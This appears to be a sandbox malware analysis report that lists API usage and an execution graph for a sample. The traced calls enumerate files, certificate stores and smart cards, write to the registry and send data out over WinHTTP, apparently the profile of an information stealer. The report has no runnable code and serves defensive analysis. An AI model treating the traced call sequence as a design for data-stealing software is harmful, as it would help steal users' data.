                                                                                                                              • Instruction ID: 05dce09b803754dc438333d14fb16c9d77e26ddd6ef6fde50045693b00902851
                                                                                                                              • Opcode Fuzzy Hash: c7b252bb0c0a7946a725b17b144dae5cf8c90d4b141733e10c6a991a9ec1216b
                                                                                                                              • Instruction Fuzzy Hash: 67019E31309104EBEB009B949C82BAB3764AF46314F2445B7F652B91E1D63D9922AB5B
                                                                                                                              APIs
                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0076054F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2562004757.000000000075D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0075D000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_75d000_vejhhuh.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4275171209-0
                                                                                                                              • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                              • Instruction ID: 0bdf50cd28fc049821dca196dc00898c5946f6752f1fbdfd6609c1825ff51032
                                                                                                                              • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                              • Instruction Fuzzy Hash: 71113C79A00208EFDB01DF98C985E99BBF5AF08350F058094F9499B362D375EA50DF80
                                                                                                                              APIs
                                                                                                                              • LocalAlloc.KERNELBASE(00000000,00515FEC,0041A04B), ref: 00419A48
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2561224243.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_40b000_vejhhuh.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocLocal
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3494564517-0
                                                                                                                              • Opcode ID: 9ec18e11195fab8466a21664cf9d2760616124b952149bfa647060a6f0581e67
                                                                                                                              • Instruction ID: cdbbb9e7b83af8b631a1fc3647d71b0b27ee278e0583f88c42ef53277000976a
                                                                                                                              • Opcode Fuzzy Hash: 9ec18e11195fab8466a21664cf9d2760616124b952149bfa647060a6f0581e67
                                                                                                                              • Instruction Fuzzy Hash: 26B092B8502600DBD2408B60EC48F953A68E398202F009260FA0085160E7700805AA10
                                                                                                                              APIs
                                                                                                                              • QueryDosDeviceW.KERNEL32(00000000,?,00000000), ref: 00419D04
                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00419D1F
                                                                                                                              • HeapDestroy.KERNEL32(00000000), ref: 00419D3E
                                                                                                                              • GetNumaProcessorNode.KERNEL32(?,00000000), ref: 00419D4D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2561224243.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_40b000_vejhhuh.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DestroyDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4159173863-0
                                                                                                                              • Opcode ID: 10b99885ae077d5513f7b4f4fe7ada249d912d148d05b578c42a7b65b8aafc25
                                                                                                                              • Instruction ID: 6966600bf98115fc682df4bae7263d4ee42c52adae4737bd1ec5881763e77970
                                                                                                                              • Opcode Fuzzy Hash: 10b99885ae077d5513f7b4f4fe7ada249d912d148d05b578c42a7b65b8aafc25
                                                                                                                              • Instruction Fuzzy Hash: B9018474600204DBE750EB64FC59BDA77A8E71C306F408176FA4996290EB745DC8CBD9
                                                                                                                              APIs
                                                                                                                              • BuildCommDCBW.KERNEL32(00000000,?), ref: 00419C64
                                                                                                                              • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00419C76
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2561224243.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_40b000_vejhhuh.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: BuildCommEnvironmentFreeStrings
                                                                                                                              • String ID: -
                                                                                                                              • API String ID: 2991353152-2547889144
                                                                                                                              • Opcode ID: f4b958283a58c4c84f181a912c03a312a762f8a4ec0123b7dccd55bff0bc5cba
                                                                                                                              • Instruction ID: eedbb3df8d483a19463c8038d1f41fe70976e2133a91f77c3139b26c4217ee6d
                                                                                                                              • Opcode Fuzzy Hash: f4b958283a58c4c84f181a912c03a312a762f8a4ec0123b7dccd55bff0bc5cba
                                                                                                                              • Instruction Fuzzy Hash: 12F02231844204A6DB209FA8DD907EF7BE8E709320F20022AE98467381E3380D86D7DA

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:31.7%
                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                              Signature Coverage:37.4%
                                                                                                                              Total number of Nodes:882
                                                                                                                              Total number of Limit Nodes:19
                                                                                                                              execution_graph 4902 7ff763af68d4 4903 7ff763af68f7 4902->4903 4904 7ff763af7234 5 API calls 4903->4904 4905 7ff763af6971 4904->4905 4906 7ff763af7234 5 API calls 4905->4906 4907 7ff763af6990 4906->4907 4908 7ff763af7234 5 API calls 4907->4908 4909 7ff763af69af 4908->4909 4912 7ff763af72d4 4909->4912 4913 7ff763af7310 5 API calls 4912->4913 4914 7ff763af72f1 4913->4914 4915 7ff763af69ce 4914->4915 4916 7ff763af1a70 5 API calls 4914->4916 4916->4915 4917 7ff763af14d4 4918 7ff763af14ea 4917->4918 4919 7ff763af1507 4917->4919 4918->4919 4920 7ff763af1501 RemoveVectoredExceptionHandler 4918->4920 4920->4919 4921 7ff763af6054 4922 7ff763af6077 4921->4922 4923 7ff763af7234 5 API calls 4922->4923 4924 7ff763af60f1 4923->4924 4925 7ff763af7234 5 API calls 4924->4925 4926 7ff763af6110 4925->4926 4927 7ff763af7234 5 API calls 4926->4927 4928 7ff763af612f 4927->4928 4929 7ff763af7234 5 API calls 4928->4929 4930 7ff763af619e 4929->4930 4931 7ff763af7234 5 API calls 4930->4931 4932 7ff763af61bd 4931->4932 4933 7ff763af72d4 5 API calls 4932->4933 4934 7ff763af61dc 4933->4934 3974 7ff763afc390 3975 7ff763afc3a3 3974->3975 3976 7ff763af1990 4 API calls 3975->3976 3977 7ff763afc3ae 3976->3977 3992 7ff763afc55c 3977->3992 3979 7ff763afc3b6 4006 7ff763afc6b4 3979->4006 3981 7ff763afc3be 4020 7ff763afc80c 3981->4020 3983 7ff763afc3c6 4034 7ff763afc404 3983->4034 3985 7ff763afc3ce 4048 7ff763afc958 3985->4048 3987 7ff763afc3d6 4062 7ff763afcab0 3987->4062 3989 7ff763afc3de 3990 7ff763af1990 4 API calls 3989->3990 3991 7ff763afc3fa 3990->3991 4076 7ff763afe958 3992->4076 3994 7ff763afc57f 4079 7ff763aff99c 3994->4079 3996 7ff763afc693 3996->3979 3997 7ff763afc594 3997->3996 3998 7ff763af1990 4 API calls 3997->3998 4005 7ff763afc5b0 3998->4005 3999 7ff763afc677 4000 7ff763af1990 4 API calls 3999->4000 4000->3996 4001 7ff763af1990 4 API calls 4001->4005 4005->3999 4005->4001 4088 7ff763af1a1c 4005->4088 4097 7ff763af25b4 4005->4097 4100 7ff763af1a70 4005->4100 4007 7ff763afe958 2 API calls 4006->4007 4008 7ff763afc6d7 4007->4008 4169 7ff763affb4c GetEnvironmentVariableW lstrcatW lstrcpyW lstrcatW FindFirstFileW 4008->4169 4010 7ff763afc7eb 4010->3981 4011 7ff763afc6ec 4011->4010 4012 7ff763af1990 4 API calls 4011->4012 4019 7ff763afc708 4012->4019 4013 7ff763afc7cf 4014 7ff763af1990 4 API calls 4013->4014 4014->4010 4015 7ff763af1990 4 API calls 4015->4019 4016 7ff763af1a1c 6 API calls 4016->4019 4017 7ff763af25b4 2 API calls 4017->4019 4018 7ff763af1a70 5 API calls 4018->4019 4019->4013 4019->4015 4019->4016 4019->4017 4019->4018 4021 7ff763afe958 2 API calls 4020->4021 4022 7ff763afc82f 4021->4022 4179 7ff763affc84 CoInitializeEx CoCreateInstance 4022->4179 4024 7ff763afc937 4024->3983 4025 7ff763afc838 4025->4024 4026 7ff763af1990 4 API calls 4025->4026 4027 7ff763afc854 4026->4027 4028 7ff763afc91b 4027->4028 4030 7ff763af1990 4 API calls 4027->4030 4031 7ff763af1a1c 6 API calls 4027->4031 4032 7ff763af25b4 2 API calls 4027->4032 4033 7ff763af1a70 5 API calls 4027->4033 4029 7ff763af1990 4 API calls 4028->4029 4029->4024 4030->4027 4031->4027 4032->4027 4033->4027 4035 7ff763afe958 2 API calls 4034->4035 4036 7ff763afc427 4035->4036 4037 7ff763aff99c 22 API calls 4036->4037 4039 7ff763afc43c 4037->4039 4038 7ff763afc53b 4038->3985 4039->4038 4040 7ff763af1990 4 API calls 4039->4040 4047 7ff763afc458 4040->4047 4041 7ff763afc51f 4042 7ff763af1990 4 API calls 4041->4042 4042->4038 4043 7ff763af1990 4 API calls 4043->4047 4044 7ff763af1a1c 6 API calls 4044->4047 4045 7ff763af25b4 2 API calls 4045->4047 4046 7ff763af1a70 5 API calls 4046->4047 4047->4041 4047->4043 4047->4044 4047->4045 4047->4046 4049 7ff763afe958 2 API calls 4048->4049 4050 7ff763afc97b 4049->4050 4192 7ff763affdf4 GetEnvironmentVariableW lstrcatW 4050->4192 4052 7ff763afca8f 4052->3987 4053 7ff763afc990 4053->4052 4054 7ff763af1990 4 API calls 4053->4054 4056 7ff763afc9ac 4054->4056 4055 7ff763afca73 4057 7ff763af1990 4 API calls 4055->4057 4056->4055 4058 7ff763af1990 4 API calls 4056->4058 4059 7ff763af1a1c 6 API calls 4056->4059 4060 7ff763af25b4 2 API calls 4056->4060 4061 7ff763af1a70 5 API calls 4056->4061 4057->4052 4058->4056 4059->4056 4060->4056 4061->4056 4063 7ff763afe958 2 API calls 4062->4063 4064 7ff763afcad3 4063->4064 4065 7ff763affdf4 19 API calls 4064->4065 4067 7ff763afcae8 4065->4067 4066 7ff763afcbe7 4066->3989 4067->4066 4068 7ff763af1990 4 API calls 4067->4068 4075 7ff763afcb04 4068->4075 4069 7ff763afcbcb 4070 7ff763af1990 4 API calls 4069->4070 4070->4066 4071 7ff763af1990 4 API calls 4071->4075 4072 7ff763af1a1c 6 API calls 4072->4075 4073 7ff763af25b4 2 API calls 4073->4075 4074 7ff763af1a70 5 API calls 4074->4075 4075->4069 4075->4071 4075->4072 4075->4073 4075->4074 4103 7ff763af25dc GetProcessHeap HeapAlloc 4076->4103 4078 7ff763afe978 4078->3994 4080 7ff763affa5c GetEnvironmentVariableW lstrcatW lstrcatW lstrcatW 4079->4080 4081 7ff763affb2b 4079->4081 4104 7ff763afff50 lstrlenW 4080->4104 4081->3997 4085 7ff763affabb 4085->4081 4086 7ff763af25b4 2 API calls 4085->4086 4119 7ff763aff294 4085->4119 4123 7ff763aff3b4 4085->4123 4087 7ff763affb10 lstrlenW 4086->4087 4087->4080 4087->4081 4159 7ff763af79f0 4088->4159 4092 7ff763af1a41 4093 7ff763af1990 4 API calls 4092->4093 4094 7ff763af1a4f 4093->4094 4095 7ff763af25b4 2 API calls 4094->4095 4096 7ff763af1a57 4095->4096 4098 7ff763af25b9 GetProcessHeap RtlFreeHeap 4097->4098 4099 7ff763af25da 4097->4099 4098->4099 4099->4005 4101 7ff763af1918 4 API calls 4100->4101 4102 7ff763af1a96 wvsprintfW 4101->4102 4102->4005 4138 7ff763af2588 GetProcessHeap HeapAlloc 4104->4138 4106 7ff763afff8c lstrlenW WideCharToMultiByte PathFileExistsA 4107 7ff763afffd2 OpenFile 4106->4107 4108 7ff763b0008f 4106->4108 4109 7ff763af25b4 GetProcessHeap RtlFreeHeap 4107->4109 4108->4085 4110 7ff763afffee 4109->4110 4110->4108 4111 7ff763affff8 GetFileSize 4110->4111 4111->4108 4112 7ff763b0000e 4111->4112 4113 7ff763af25dc GetProcessHeap HeapAlloc 4112->4113 4114 7ff763b00016 4113->4114 4114->4108 4115 7ff763b0001e CreateFileMappingA 4114->4115 4115->4108 4116 7ff763b00042 MapViewOfFile 4115->4116 4117 7ff763b00108 __memcpy 4116->4117 4118 7ff763b0006c UnmapViewOfFile CloseHandle CloseHandle 4117->4118 4118->4108 4120 7ff763aff2b7 __memcpy 4119->4120 4122 7ff763aff2df 4120->4122 4139 7ff763affed8 4120->4139 4122->4085 4124 7ff763aff4fe 4123->4124 4125 7ff763aff3e9 4123->4125 4124->4085 4125->4124 4126 7ff763aff51f 4125->4126 4127 7ff763aff43d 4125->4127 4126->4124 4149 7ff763aff354 4126->4149 4145 7ff763aff2f4 4127->4145 4130 7ff763aff4e6 4131 7ff763aff3b4 4 API calls 4130->4131 4131->4124 4132 7ff763aff3b4 4 API calls 4133 7ff763aff449 4132->4133 4133->4124 4133->4130 4133->4132 4134 7ff763aff530 __memcpy 4134->4124 4137 7ff763af25b4 GetProcessHeap RtlFreeHeap 4134->4137 4153 7ff763af25dc GetProcessHeap HeapAlloc 4134->4153 4154 7ff763aff6fc 4134->4154 4137->4134 4144 7ff763af25dc GetProcessHeap HeapAlloc 4139->4144 4141 7ff763affefd __memcpy 4142 7ff763af25b4 GetProcessHeap RtlFreeHeap 4141->4142 4143 7ff763afff36 4142->4143 4143->4120 4147 7ff763aff317 __memcpy 4145->4147 4146 7ff763affed8 4 API calls 4146->4147 4147->4146 4148 7ff763aff33f 4147->4148 4148->4133 4151 7ff763aff377 __memcpy 4149->4151 4150 7ff763affed8 4 API calls 4150->4151 4151->4150 4152 7ff763aff39f 4151->4152 4152->4134 4156 7ff763aff72e 4154->4156 4157 7ff763aff77b 4156->4157 4158 7ff763af25dc GetProcessHeap HeapAlloc 4156->4158 4157->4134 4160 7ff763af7a0d 4159->4160 4162 7ff763af1a36 4159->4162 4167 7ff763af25dc GetProcessHeap HeapAlloc 4160->4167 4163 7ff763af7dc8 4162->4163 4164 7ff763af7de9 4163->4164 4168 7ff763af25dc GetProcessHeap HeapAlloc 4164->4168 4166 7ff763af7df8 4166->4092 4170 7ff763affbd6 lstrcatW lstrcatW FindClose 4169->4170 4171 7ff763affc64 4169->4171 4172 7ff763afff50 17 API calls 4170->4172 4171->4011 4173 7ff763affc0f 4172->4173 4173->4171 4174 7ff763aff294 4 API calls 4173->4174 4175 7ff763affc28 4174->4175 4175->4171 4176 7ff763aff3b4 4 API calls 4175->4176 4177 7ff763affc5a 4176->4177 4178 7ff763af25b4 2 API calls 4177->4178 4178->4171 4180 7ff763affcca 4179->4180 4185 7ff763affcd4 4179->4185 4180->4025 4181 7ff763affdd7 CoUninitialize 4181->4180 4182 7ff763affcf5 lstrlenW WideCharToMultiByte 4182->4185 4185->4181 4185->4182 4187 7ff763af25dc GetProcessHeap HeapAlloc 4185->4187 4188 7ff763afe9e0 4185->4188 4189 7ff763afea10 4188->4189 4191 7ff763afea1b 4188->4191 4190 7ff763af2654 4 API calls 4189->4190 4190->4191 4191->4185 4193 7ff763afff50 17 API calls 4192->4193 4194 7ff763affe46 4193->4194 4195 7ff763affe9b 4194->4195 4196 7ff763aff294 4 API calls 4194->4196 4195->4053 4197 7ff763affe5f 4196->4197 4197->4195 4198 7ff763aff3b4 4 API calls 4197->4198 4199 7ff763affe91 4198->4199 4200 7ff763af25b4 2 API calls 4199->4200 4200->4195 4943 7ff763afecd0 4944 7ff763afee1b 4943->4944 4945 7ff763afecfe 4943->4945 4945->4944 4957 7ff763af25dc GetProcessHeap HeapAlloc 4945->4957 4958 7ff763af250c 4963 7ff763af213c 4958->4963 4962 7ff763af253b 5006 7ff763af1c80 4963->5006 4966 7ff763af25b4 2 API calls 4967 7ff763af219e 4966->4967 4968 7ff763af24e6 4967->4968 4969 7ff763af21ba WinHttpCrackUrl 4967->4969 4968->4962 4995 7ff763af1eec 4968->4995 4970 7ff763af21e6 4969->4970 4971 7ff763af24dd WinHttpCloseHandle 4969->4971 4972 7ff763af21f7 WinHttpConnect 4970->4972 4971->4968 4972->4971 4973 7ff763af2225 4972->4973 4973->4973 4974 7ff763af228b WinHttpOpenRequest 4973->4974 4975 7ff763af24cd WinHttpCloseHandle 4974->4975 4976 7ff763af22ba 4974->4976 4975->4971 4977 7ff763af2304 WinHttpSendRequest 4976->4977 4978 7ff763af22c0 WinHttpQueryOption WinHttpSetOption 4976->4978 4979 7ff763af24c4 WinHttpCloseHandle 4977->4979 4980 7ff763af232b WinHttpReceiveResponse 4977->4980 4978->4977 4979->4975 4980->4979 4981 7ff763af233e 4980->4981 4982 7ff763afe7e0 2 API calls 4981->4982 4983 7ff763af234d WinHttpQueryDataAvailable 4982->4983 4984 7ff763afe6f0 4 API calls 4983->4984 4985 7ff763af236d WinHttpReadData 4984->4985 4986 7ff763af238b 4985->4986 4986->4983 4987 7ff763afe740 4 API calls 4986->4987 4989 7ff763af239f 4986->4989 4987->4986 4988 7ff763af24ba 4988->4979 4989->4988 5010 7ff763af7a60 4989->5010 5034 7ff763af1de8 4995->5034 4998 7ff763af2121 4998->4962 4999 7ff763af1f5e SysAllocString SafeArrayCreateVector SafeArrayAccessData 5000 7ff763af262c 4999->5000 5001 7ff763af1fa8 SafeArrayUnaccessData 5000->5001 5004 7ff763af1fd9 5001->5004 5003 7ff763af1ffe SysFreeString 5003->4998 5004->5003 5005 7ff763af1cbc 11 API calls 5004->5005 5005->5003 5007 7ff763af1ca1 5006->5007 5008 7ff763af1ca5 WinHttpOpen 5007->5008 5009 7ff763af79f0 2 API calls 5007->5009 5008->4966 5009->5008 5011 7ff763af24a5 5010->5011 5012 7ff763af7a84 5010->5012 5014 7ff763af1cbc 5011->5014 5022 7ff763af25dc GetProcessHeap HeapAlloc 5012->5022 5023 7ff763afa534 5014->5023 5024 7ff763afa565 5023->5024 5033 7ff763af25dc GetProcessHeap HeapAlloc 5024->5033 5040 7ff763af1b74 5034->5040 5036 7ff763af1e06 RegCreateKeyExA 5037 7ff763af1e3f CoInitializeEx VariantInit CoCreateInstance 5036->5037 5038 7ff763af1e46 5036->5038 5037->4998 5037->4999 5038->5038 5039 7ff763af1ea2 RegSetValueExA RegCloseKey 5038->5039 5039->5037 5041 7ff763af1bc3 5040->5041 5041->5036 4762 7ff763af9ac8 4763 7ff763af9af7 4762->4763 4764 7ff763af1990 4 API calls 4763->4764 4765 7ff763af9b02 4764->4765 4766 7ff763af9644 2 API calls 4765->4766 4767 7ff763af9b0b 4766->4767 4767->4767 4768 7ff763af900c 16 API calls 4767->4768 4769 7ff763af9b64 4768->4769 4770 7ff763afa4fb 4769->4770 4771 7ff763af95a0 8 API calls 4769->4771 4772 7ff763af1990 4 API calls 4770->4772 4774 7ff763af9b7c 4771->4774 4773 7ff763afa513 4772->4773 4774->4770 4775 7ff763af97dc 16 API calls 4774->4775 4776 7ff763af9b9c 4775->4776 4776->4770 4777 7ff763af1990 4 API calls 4776->4777 4778 7ff763af9bb6 4777->4778 4779 7ff763af97dc 16 API calls 4778->4779 4780 7ff763af9bce 4779->4780 4780->4770 4781 7ff763af1990 4 API calls 4780->4781 4782 7ff763af9be1 4781->4782 4783 7ff763af97dc 16 API calls 4782->4783 4784 7ff763af9bf9 4783->4784 4784->4770 4785 7ff763af1990 4 API calls 4784->4785 4786 7ff763af9c0c 4785->4786 4787 7ff763af97dc 16 API calls 4786->4787 4788 7ff763af9c24 4787->4788 4788->4770 4789 7ff763af1990 4 API calls 4788->4789 4790 7ff763af9c37 4789->4790 4791 7ff763af97dc 16 API calls 4790->4791 4792 7ff763af9c4f 4791->4792 4792->4770 4793 7ff763af1990 4 API calls 4792->4793 4794 7ff763af9c62 4793->4794 4795 7ff763af97dc 16 API calls 4794->4795 4796 7ff763af9c7a 4795->4796 4796->4770 4797 7ff763af1990 4 API calls 4796->4797 4798 7ff763af9c8d 4797->4798 4799 7ff763af97dc 16 API calls 4798->4799 4800 7ff763af9ca5 4799->4800 4800->4770 4801 7ff763af1990 4 API calls 4800->4801 4802 7ff763af9cb8 4801->4802 4803 7ff763af97dc 16 API calls 4802->4803 4804 7ff763af9cd0 4803->4804 4804->4770 4805 7ff763af1990 4 API calls 4804->4805 4806 7ff763af9ce3 4805->4806 4807 7ff763af97dc 16 API calls 4806->4807 4808 7ff763af9cfb 4807->4808 4808->4770 4809 7ff763af1990 4 API calls 4808->4809 4810 7ff763af9d0e 4809->4810 4811 7ff763af97dc 16 API calls 4810->4811 4812 7ff763af9d26 4811->4812 4812->4770 4813 7ff763af1990 4 API calls 4812->4813 4814 7ff763af9d39 4813->4814 4815 7ff763af97dc 16 API calls 4814->4815 4816 7ff763af9d51 4815->4816 4816->4770 4817 7ff763af1990 4 API calls 4816->4817 4818 7ff763af9d64 4817->4818 4819 7ff763af97dc 16 API calls 4818->4819 4820 7ff763af9d7c 4819->4820 4820->4770 4821 7ff763af1990 4 API calls 4820->4821 4822 7ff763af9d8f 4821->4822 4823 7ff763af97dc 16 API calls 4822->4823 4824 7ff763af9da7 4823->4824 4824->4770 4825 7ff763af1990 4 API calls 4824->4825 4826 7ff763af9dba 4825->4826 4827 7ff763af97dc 16 API calls 4826->4827 4828 7ff763af9dd2 4827->4828 4828->4770 4829 7ff763af1990 4 API calls 4828->4829 4830 7ff763af9de5 4829->4830 4830->4830 4831 7ff763af97dc 16 API calls 4830->4831 4832 7ff763af9e45 4831->4832 4832->4770 4833 7ff763af1990 4 API calls 4832->4833 4834 7ff763af9e58 4833->4834 4834->4834 4835 7ff763af97dc 16 API calls 4834->4835 4836 7ff763af9eb4 4835->4836 4836->4770 4837 7ff763af1990 4 API calls 4836->4837 4838 7ff763af9ec7 4837->4838 4838->4838 4839 7ff763af97dc 16 API calls 4838->4839 4840 7ff763af9f2d 4839->4840 4840->4770 4841 7ff763af1990 4 API calls 4840->4841 4842 7ff763af9f40 4841->4842 4842->4842 4843 7ff763af97dc 16 API calls 4842->4843 4844 7ff763af9f97 4843->4844 4844->4770 4845 7ff763af1990 4 API calls 4844->4845 4846 7ff763af9fb1 4845->4846 4846->4846 4847 7ff763af97dc 16 API calls 4846->4847 4848 7ff763afa006 4847->4848 4848->4770 4849 7ff763af1990 4 API calls 4848->4849 4850 7ff763afa019 4849->4850 4850->4850 4851 7ff763af97dc 16 API calls 4850->4851 4852 7ff763afa079 4851->4852 4852->4770 4853 7ff763af1990 4 API calls 4852->4853 4854 7ff763afa08c 4853->4854 4854->4854 4855 7ff763af97dc 16 API calls 4854->4855 4856 7ff763afa0e2 4855->4856 4856->4770 4857 7ff763af1990 4 API calls 4856->4857 4858 7ff763afa0f9 4857->4858 4858->4858 4859 7ff763af97dc 16 API calls 4858->4859 4860 7ff763afa157 4859->4860 4860->4770 4861 7ff763af1990 4 API calls 4860->4861 4862 7ff763afa16e 4861->4862 4862->4862 4863 7ff763af97dc 16 API calls 4862->4863 4864 7ff763afa1c8 4863->4864 4864->4770 4865 7ff763af1990 4 API calls 4864->4865 4866 7ff763afa1df 4865->4866 4866->4866 4867 7ff763af97dc 16 API calls 4866->4867 4868 7ff763afa227 4867->4868 4868->4770 4869 7ff763af1990 4 API calls 4868->4869 4870 7ff763afa23e 4869->4870 4870->4870 4871 7ff763af97dc 16 API calls 4870->4871 4872 7ff763afa290 4871->4872 4872->4770 4873 7ff763af1990 4 API calls 4872->4873 4874 7ff763afa2a7 4873->4874 4874->4874 4875 7ff763af97dc 16 API calls 4874->4875 4876 7ff763afa2ee 4875->4876 4876->4770 4877 7ff763af1990 4 API calls 4876->4877 4878 7ff763afa305 4877->4878 4878->4878 4879 7ff763af97dc 16 API calls 4878->4879 4880 7ff763afa359 4879->4880 4880->4770 4881 7ff763af1990 4 API calls 4880->4881 4882 7ff763afa370 4881->4882 4882->4882 4883 7ff763af97dc 16 API calls 4882->4883 4884 7ff763afa3bc 4883->4884 4884->4770 4885 7ff763af1990 4 API calls 4884->4885 4886 7ff763afa3d6 4885->4886 4886->4886 4887 7ff763af97dc 16 API calls 4886->4887 4888 7ff763afa437 4887->4888 4888->4770 4889 7ff763af1990 4 API calls 4888->4889 4890 7ff763afa44a 4889->4890 4890->4890 4891 7ff763af97dc 16 API calls 4890->4891 4892 7ff763afa499 4891->4892 4892->4770 4893 7ff763af1990 4 API calls 4892->4893 4894 7ff763afa4a8 4893->4894 4894->4894 4895 7ff763af97dc 16 API calls 4894->4895 4896 7ff763afa4ee 4895->4896 4896->4770 4897 7ff763af9478 13 API calls 4896->4897 4897->4770 3952 7ff763af31c4 3953 7ff763af31d7 3952->3953 3960 7ff763af1990 3953->3960 3955 7ff763af31e2 3956 7ff763af1990 4 API calls 3955->3956 3957 7ff763af31f1 CertEnumSystemStoreLocation 3956->3957 3958 7ff763af1990 4 API calls 3957->3958 3959 7ff763af3215 3958->3959 3961 7ff763af19ad 3960->3961 3964 7ff763af1918 3961->3964 3963 7ff763af19ba 3963->3955 3965 7ff763af1951 3964->3965 3966 7ff763af192e 3964->3966 3965->3963 3966->3966 3968 7ff763af2654 3966->3968 3969 7ff763af2682 3968->3969 3970 7ff763af2669 GetProcessHeap RtlReAllocateHeap 3968->3970 3973 7ff763af25dc GetProcessHeap HeapAlloc 3969->3973 3971 7ff763af268a 3970->3971 3971->3965 5049 7ff763afe3c0 lstrcpyW PathAppendW 5050 7ff763afe437 5049->5050 5051 7ff763afcd0c 6 API calls 5050->5051 5052 7ff763afe477 5051->5052 5053 7ff763afe4ce 5052->5053 5054 7ff763af1990 4 API calls 5052->5054 5055 7ff763afe48a 5054->5055 5056 7ff763af19e4 4 API calls 5055->5056 5057 7ff763afe495 5056->5057 5058 7ff763af1990 4 API calls 5057->5058 5059 7ff763afe4a4 5058->5059 5060 7ff763af19e4 4 API calls 5059->5060 5061 7ff763afe4b3 5060->5061 5062 7ff763af1990 4 API calls 5061->5062 5063 7ff763afe4c2 5062->5063 5064 7ff763af25b4 2 API calls 5063->5064 5064->5053 4501 7ff763afb43c 4502 7ff763afb45f 4501->4502 4503 7ff763af1990 4 API calls 4502->4503 4504 7ff763afb46a 4503->4504 4505 7ff763af1990 4 API calls 4504->4505 4506 7ff763afb479 4505->4506 4507 7ff763afb89d 4506->4507 4508 7ff763afb49a 4506->4508 4509 7ff763af1990 4 API calls 4507->4509 4510 7ff763afb4c3 4508->4510 4511 7ff763afb74a 4508->4511 4512 7ff763afb8b1 4509->4512 4514 7ff763af1990 4 API calls 4510->4514 4513 7ff763af1990 4 API calls 4511->4513 4516 7ff763af1990 4 API calls 4512->4516 4515 7ff763afb75a 4513->4515 4553 7ff763afb4d3 4514->4553 4520 7ff763af1990 4 API calls 4515->4520 4517 7ff763afb8c5 4516->4517 4518 7ff763af1a70 5 API calls 4517->4518 4521 7ff763afb89b 4518->4521 4519 7ff763afb739 4522 7ff763af1990 4 API calls 4519->4522 4523 7ff763afb76e 4520->4523 4524 7ff763af1990 4 API calls 4521->4524 4528 7ff763afb748 4522->4528 4526 7ff763af1a70 5 API calls 4523->4526 4527 7ff763afb8e6 4524->4527 4525 7ff763af1990 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4525->4553 4526->4528 4529 7ff763af1990 4 API calls 4528->4529 4530 7ff763afb794 SCardListCardsW 4529->4530 4531 7ff763afb856 4530->4531 4532 7ff763afb7cd 4530->4532 4534 7ff763af1990 4 API calls 4531->4534 4533 7ff763af1990 4 API calls 4532->4533 4548 7ff763afb7dd 4533->4548 4535 7ff763afb866 4534->4535 4539 7ff763af1990 4 API calls 4535->4539 4536 7ff763afb53f SCardGetStatusChangeW 4536->4553 4537 7ff763afb838 4538 7ff763af1990 4 API calls 4537->4538 4540 7ff763afb847 SCardFreeMemory 4538->4540 4541 7ff763afb87a 4539->4541 4542 7ff763afb88c 4540->4542 4544 7ff763af1a70 5 API calls 4541->4544 4546 7ff763af1990 4 API calls 4542->4546 4543 7ff763af1a70 wvsprintfW GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4543->4553 4544->4542 4545 7ff763af19e4 4 API calls 4545->4548 4546->4521 4547 7ff763af1990 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4547->4548 4548->4537 4548->4545 4548->4547 4549 7ff763afb5d3 SCardListCardsW 4549->4553 4550 7ff763af1990 4 API calls 4551 7ff763afb68a SCardFreeMemory 4550->4551 4551->4553 4552 7ff763af19e4 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4552->4553 4553->4519 4553->4525 4553->4536 4553->4543 4553->4549 4553->4550 4553->4552 4554 7ff763af73fc 4555 7ff763af743f 4554->4555 4556 7ff763af1990 4 API calls 4555->4556 4557 7ff763af746e 4556->4557 4558 7ff763af1a70 5 API calls 4557->4558 4559 7ff763af7490 4558->4559 4560 7ff763af1a70 5 API calls 4559->4560 4561 7ff763af74a4 4560->4561 4602 7ff763af78ec 4561->4602 4564 7ff763af1990 4 API calls 4565 7ff763af74c5 4564->4565 4566 7ff763af1a70 5 API calls 4565->4566 4567 7ff763af74d9 4566->4567 4608 7ff763af79c4 GetNativeSystemInfo 4567->4608 4570 7ff763af1990 4 API calls 4571 7ff763af74fa 4570->4571 4610 7ff763af7138 CoInitializeEx CoInitializeSecurity CoCreateInstance 4571->4610 4573 7ff763af7503 4578 7ff763af75d1 4573->4578 4611 7ff763af785c 4573->4611 4574 7ff763af783c 4622 7ff763af7104 4574->4622 4578->4574 4579 7ff763af785c 5 API 